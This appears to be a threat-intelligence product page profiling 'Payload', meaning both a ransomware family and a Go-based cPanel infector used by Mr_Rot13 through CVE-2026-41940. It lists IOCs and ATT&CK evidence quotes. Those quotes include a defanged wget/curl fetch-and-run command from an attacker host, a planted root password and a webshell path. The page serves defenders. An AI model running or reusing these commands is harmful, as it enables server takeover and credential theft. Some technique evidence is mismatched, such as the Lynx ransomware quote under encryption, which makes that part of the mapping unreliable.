Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
MalwareRansomwareUsed by 1 actorExploits 1 CVE

Payload

Payload refers to two distinct malware usages in the provided content. Most prominently, Payload is described as an emerging ransomware family active since at least February 2026. It targets Windows and Linux/ESXi systems, appends the .payload extension to encrypted files, and drops a ransom note named RECOVER_payload.txt. Reported capabilities include Curve25519 ECDH and ChaCha20-based per-file encryption, partial encryption of large files, encryption of local and network drives, deletion of shadow copies, clearing of Windows Event Logs, ETW patching in ntdll.dll, termination of backup, database, security, and office-related services and processes, and self-deletion via NTFS alternate data streams. The Windows variant uses the mutex MakeAmericaGreatAgain. The Linux/ESXi variant parses /etc/vmware/hostd/vmInventory.xml to locate VMware disk paths. The ransomware has been associated with leak-site activity and claimed victims across sectors including logistics, transportation, construction, real estate, manufacturing, technology, healthcare, telecom, energy, agriculture, and smaller healthcare providers and clinics. Reported observables include the SHA-256 hash 1ca67af90400ee6cbbd42175293274a0f5dc05315096cb2e214e4bfe12ffb71f for payload.exe, the SHA-256 hash 29f7f8ccd00ff392dde56ede64b5cae2f0a72dfade096de7a8e4fe1428728c37 for RECOVER_payload.txt, and Tor infrastructure including payloadrz5yw227brtbvdqpnlhq3rdcdekdnn3rgucbcdeawq2v6vuyd[.]onion and payloadynyvabjacbun4uwhmxc7yvdzorycslzmnleguxjn7glahsvqd[.]onion. Separately, the content also describes a Go-based malware installer project named Payload delivered via exploitation of CVE-2026-41940 against cPanel & WHM. That Payload implants an SSH public key, changes the root password to 123Qwe123C, deploys a PHP webshell at /usr/local/cpanel/cgi-sys/cpanel.py, injects malicious login.js and login.tmpl into the cPanel login path to steal usernames, passwords, User-Agent strings, and URLs, exfiltrates data to wrned.com, cp.dene.de.com/collect.php, and a Telegram group controlled by the attackers, and ultimately deploys a cross-platform remote-control trojan named filemanager. This activity is attributed in the content to a cluster tracked as Mr_Rot13 and is associated with infrastructure including wrned.com, cp.dene.de.com, and wpsock.com, as well as MD5 hashes fb1bc3f935fdeb3555465070ba2db33c for the Update/Payload installer, 9305b4ebbb4d39907cf36b62989a6af3 for a Linux AMD64 filemanager sample, and 2286f126ab4740ccf2595ad1fa0c615c for a related helper.php backdoor. Because the provided content uses the same name for both a ransomware family and a separate Go-based cPanel infector, the naming is ambiguous.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES
CVE-2026-41940cPanel & WHM Authentication Bypass via Session-File CRLF InjectionExploited in the wild

Attackers are exploiting cPanel flaw CVE-2026-41940 to install the Filemanager backdoor and gain unauthorized admin access... CVE-2026-41940 is an authentication bypass flaw affecting cPanel and WHM versions after 11.40. | Researchers also uncovered a new Go-based malware called “Payload,” which installs SSH keys, malicious PHP and JavaScript code, steals credentials, and sends stolen data to attackers through Telegram before deploying a remote-control trojan named Filemanager.

via security affairssecurityaffairs.com
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Mr_Rot13

Researchers also uncovered a new Go-based malware called “Payload,” which installs SSH keys, malicious PHP and JavaScript code, steals credentials, and sends stolen data to attackers through Telegram before deploying a remote-control trojan named Filemanager.

via security affairssecurityaffairs.com
MITRE ATT&CK

Techniques & procedures

28 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1078Valid AccountsEvidence2

Researchers discovered a new Go-based malware called “Payload,” which installs SSH keys...

T1190Exploit Public-Facing ApplicationEvidence2

Attackers are exploiting cPanel flaw CVE-2026-41940 to install the Filemanager backdoor and gain unauthorized admin access.

Execution

2 techniques
T1059.004Unix ShellEvidence3

...run it continuously in the background using the nohup command... wget ... || curl ... && chmod 755 "$F" && (nohup "$F" -s >/dev/null 2>&1 &) && sleep 2; rm -f "$F"

T1059.007JavaScriptEvidence1

注入Javascript代码,对应的处理函数为main_injectLoginPage 从远程服务器cp.dene.de[.]com下载login.js,login.tmpl... 在login.js则通过下载代码片段实现窃取用户登录时的用户名、密码、User-Agent以及当前URL

Persistence

5 techniques
T1078Valid AccountsEvidence2

Researchers discovered a new Go-based malware called “Payload,” which installs SSH keys...

T1098Account ManipulationEvidence1

Modify ROOT password root:123Qwe123C Implant SSH public key ssh-ed25519 ... cpanel-updater

T1098.004SSH Authorized KeysEvidence2

修该密码 & 植入SSH 公钥,对应的处理函数分别为main_changeRootPassword和main_installSSHKey... 植入SSH 公钥 ssh-ed25519 ... cpanel-updater

T1505.003Web ShellEvidence2

Written in Go and likely generated with AI assistance, the malware changes root passwords, installs SSH keys, deploys PHP webshells, injects malicious JavaScript into cPanel login pages, steals credentials, and exfiltrates sensitive data.

T1556Modify Authentication ProcessEvidence2

Inject Javascript code... Download login.js and login.tmpl from the remote server... save them to /usr/local/cpanel/base/unprotected/cpanel to create a customized login page.

Privilege Escalation

4 techniques
T1068Exploitation for Privilege EscalationEvidence1

CVE-2026-41940 is a high-severity unauthenticated authentication bypass vulnerability affecting cPanel & WHM... an attacker can remotely bypass authentication and take over the cPanel / WHM control panel, allowing an unauthenticated remote attacker to gain administrator privileges on the affected server.

T1078Valid AccountsEvidence2

Researchers discovered a new Go-based malware called “Payload,” which installs SSH keys...

T1098Account ManipulationEvidence1

Modify ROOT password root:123Qwe123C Implant SSH public key ssh-ed25519 ... cpanel-updater

T1098.004SSH Authorized KeysEvidence2

修该密码 & 植入SSH 公钥,对应的处理函数分别为main_changeRootPassword和main_installSSHKey... 植入SSH 公钥 ssh-ed25519 ... cpanel-updater

Stealth

4 techniques
T1027Obfuscated Files or InformationEvidence1

服务器地址 uggcf://jearq.pbz/ybt.cuc?g=3 使用ROT13编码... 该文件由2部分组成... 从 </script>*/ 之后为混淆的恶意代码。混淆方式为简单的字串xor拼接混淆... 去混淆后为 str_rot13

T1036MasqueradingEvidence2

This so-called Update file is the Payload infector mentioned earlier.

T1070Indicator RemovalEvidence1

The malware downloads and runs a backdoor called Filemanager from attacker-controlled servers, then deletes traces of the installer.

T1078Valid AccountsEvidence2

Researchers discovered a new Go-based malware called “Payload,” which installs SSH keys...

Defense Impairment

1 technique
T1556Modify Authentication ProcessEvidence2

Inject Javascript code... Download login.js and login.tmpl from the remote server... save them to /usr/local/cpanel/base/unprotected/cpanel to create a customized login page.

Credential Access

6 techniques
T1056Input CaptureEvidence2

Written in Go and likely generated with AI assistance, the malware changes root passwords, installs SSH keys, deploys PHP webshells, injects malicious JavaScript into cPanel login pages, steals credentials, and exfiltrates sensitive data.

T1056.003Web Portal CaptureEvidence1

The login.js ... steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.

T1056.004Credential API HookingEvidence1

The login.js... uses code snippets to steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.

T1555Credentials from Password StoresEvidence2

Its main functions are: implanting an SSH public key, malicious PHP, and JS code into the compromised cPanel system, stealing login credentials, sending the stolen information back to a Telegram group controlled by the attackers

T1556Modify Authentication ProcessEvidence2

Inject Javascript code... Download login.js and login.tmpl from the remote server... save them to /usr/local/cpanel/base/unprotected/cpanel to create a customized login page.

T1649Steal or Forge Authentication CertificatesEvidence1

The infector collects sensitive information from the compromised system, including bash history, ssh data...

Discovery

1 technique
T1082System Information DiscoveryEvidence1

The infector collects sensitive information from the compromised system, including bash history, ssh data, device information...

Collection

5 techniques
T1005Data from Local SystemEvidence1

The infector collects sensitive information from the compromised system, including bash history, ssh data, device information, database passwords, Valiases configuration, etc., and sends it back to the hacker's server.

T1056Input CaptureEvidence2

Written in Go and likely generated with AI assistance, the malware changes root passwords, installs SSH keys, deploys PHP webshells, injects malicious JavaScript into cPanel login pages, steals credentials, and exfiltrates sensitive data.

T1056.003Web Portal CaptureEvidence1

The login.js ... steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.

T1056.004Credential API HookingEvidence1

The login.js... uses code snippets to steal the user's username, password, User-Agent, and current URL during login, and sends this sensitive data via an AJAX request to a remote server controlled by the attackers.

T1560Archive Collected DataEvidence1

收集被入侵系统的bash历史记录,ssh,设备信息,数据库密码,Valiases配置等敏感信息,回传到黑客服务器

Command and Control

5 techniques
T1071Application Layer ProtocolEvidence1

The attackers also used Telegram bots as a backup channel to receive stolen information.

T1071.001Web ProtocolsEvidence1

The C2 responds with a JSON object... reports key parameters... back to the C2 address https://wrned.]com/api.php?t=3&c=1 ... sends this sensitive data via an AJAX request to a remote server controlled by the attackers.

T1090.003Multi-hop ProxyEvidence1

sending the stolen information back to a Telegram group controlled by the attackers

T1105Ingress Tool TransferEvidence3

Its function is to request a malicious payload named Update from the download server cp.dene.[de.com , and run it continuously in the background using the nohup command... wget -q -O "$F" 'https://cp.dene.[de.com/Update' ... || curl -sk -o "$F" 'https://cp.dene.[de.com/Update'

T1219Remote Access ToolsEvidence1

Deploy Filemanager remote-control tool... Filemanager is a cross-platform backdoor... At runtime, Filemanager listens on the port specified by the port parameter and provides the attacker with a channel for remotely managing the compromised system via a Web page.

Exfiltration

2 techniques
T1041Exfiltration Over C2 ChannelEvidence2

...sends this sensitive data via an AJAX request to a remote server controlled by the attackers... The reporting endpoint is https://cp.dene.de[.]com/collect.php .

T1567Exfiltration Over Web ServiceEvidence2

...sending the stolen information back to a Telegram group controlled by the attackers... the Payload infector also supports a redundant Telegram exfiltration channel.

Impact

1 technique
T1486Data Encrypted for ImpactEvidence1

Lynx is a ransomware group operating under a double extortion model, combining encryption with data exfiltration.

INDICATORS OF COMPROMISE

IOCs tracked for this family

16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
6 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
7 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
3 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
hash.md5●●●●●●●●●●●●View more in app1 month ago
domain●●●●●●●●●●●●View more in app1 month ago
ip.v4●●●●●●●●●●●●View more in app1 month ago
ip.v4●●●●●●●●●●●●View more in app1 month ago
domain●●●●●●●●●●●●View more in app1 month ago
hash.md5●●●●●●●●●●●●View more in app1 month ago
ACTIVITY FEED

Recent activity

7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

cyber security newsNews
May 26, 2026
Payload Ransomware Uses ChaCha20 and Curve25519 ECDH to Encrypt Windows Files

Payload is a Windows-targeting ransomware family that encrypts files and appends the .payload extension, drops a ransom note named RECOVER_payload.txt, deletes shadow copies, clears event logs, terminates backup/database/office processes and services, and uses Curve25519 ECDH with ChaCha20 for per-file encryption.

Read more
security affairsNews
May 12, 2026
Attackers exploit cPanel CVE-2026-41940 to deploy Filemanager Backdoor

A Go-based malware infector used in attacks exploiting cPanel CVE-2026-41940. It implants SSH keys, malicious PHP and JavaScript, changes root passwords, injects webshells and login-page JavaScript, steals credentials, exfiltrates data via Telegram, and deploys the Filemanager trojan for persistent access.

Read more
qianxin xlab blogNews
May 11, 2026
秘密活动6年的神秘黑客组织Mr_Rot13正在利用cPanel高危漏洞部署后门木马

A Go-based infector/downloader delivered via CVE-2026-41940 against cPanel & WHM. It changes the root password, installs an SSH public key, drops a PHP webshell, injects malicious JavaScript into the login page to steal credentials, exfiltrates host and credential data to attacker infrastructure and Telegram, and deploys the Filemanager RAT.

Read more
qianxin xlab blogNews
May 11, 2026
Threat Actor Mr_Rot13 Actively Exploits CVE-2026-41940 for Backdoor Deployment

A Go-based infector delivered via exploitation of CVE-2026-41940. It modifies the root password, installs SSH keys, drops a PHP webshell and malicious JavaScript, steals credentials and system data, exfiltrates data to attacker infrastructure and Telegram, and deploys the Filemanager remote-control trojan.

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching16

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping28

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.